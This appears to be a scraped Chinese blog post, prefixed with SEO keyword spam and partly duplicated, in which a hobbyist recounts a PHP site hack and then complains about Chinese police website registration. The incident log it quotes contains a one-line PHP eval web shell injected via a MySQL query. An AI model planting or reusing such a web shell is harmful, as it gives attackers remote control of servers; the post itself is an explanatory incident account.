珠宝网站形象设计,网络营销的目的,asp网站后台制作,宁波优化推广选哪家我原以为世界上有技术的那批人不会那么闲#xff0c;我错了#xff0c;被脚本真实了。
今天正隔着画画呢#xff0c;手机突然弹出几条安全告警通知。 急忙打开服务器#xff0c;发现问题不简单#xff0c;直接关服务器重装系统.....
首先#xff0c;不要认为小网站我错了被脚本真实了。
今天正隔着画画呢手机突然弹出几条安全告警通知。 急忙打开服务器发现问题不简单直接关服务器重装系统.....
首先不要认为小网站没什么人看就不做防护
互联网不缺乏脚本小子和没啥事喜欢攻击的黑客在这个时代也不是没有可能是恶意的流窜ai不要向我一样认为这个网站没什么人看什么保护也不加等到被爆破了才急忙修改要是生产环境被这么搞一下那就很坏了。各种意义上的
因为我是php写的网站php的漏洞很多是历史遗留问题了没有很好的代码规范的话那很容易被入侵。
就比如我没有加入文件验证之类的我当时的想法不会有人这么闲吧。 我的思考
php这个语言漏洞太多对于我来说要么以后补课网络安全php这方面的课程要么趁早换一门语言。
那名坏笔到底在我服务器干了什么呢
事情已经发生了气急败坏不如冷静分析。
首先是恶意上传一个php文件然后查询了我所有的数据库文件
具体的代码如下
C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument60 Query select?php eval($_POST[admin]);?60 Quit
那很坏了
eval 函数在这种情况下如果被成功执行明显是具有恶意企图的可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。
第二个是一个木马病毒 太坏了
根据计算机病毒百科来看这玩意是近几年的开发的病毒。
可能会修改系统的关键文件造成系统崩溃或无法正常启动。
它可以监控用户的计算机操作并窃取敏感信息如银行账户密码、个人隐私等。
所以说病毒什么乱七八糟并不是少了而是坏笔们不直接打普通电脑了。 最终它干了什么
看样子是想把我服务器当作代理不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。
然后正上厕所呢公安给我打电话来了。
公安备案失败
之前icp备案根据腾讯云的提示操作起来没有过于麻烦就是写写表个人是这样企业的话多一些步骤。
然后icp过完审核居然还要公安部审核就不能一起审核吗真是徒增开发者的麻烦呢。
个人的网站icp备案和公安的表几乎没有什么差别所以真的很难理解呢
然后就打电话告诉我说不受理去自己的户籍地办理去icp是常驻地
emm...??? 感叹一些地方上的办事效率差效率低了。
所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗
不啊我的朋友个人博客要就不申请域名要不就一步到位买国外的好啦就不用这么多麻烦的手续啦
